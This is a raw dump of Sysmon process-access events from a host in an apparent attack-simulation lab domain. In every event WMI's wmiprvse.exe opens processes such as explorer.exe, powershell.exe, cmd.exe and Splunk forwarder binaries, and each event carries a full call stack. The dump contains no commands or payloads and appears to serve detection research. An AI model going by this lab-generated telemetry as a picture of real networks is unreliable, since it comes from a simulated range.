32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 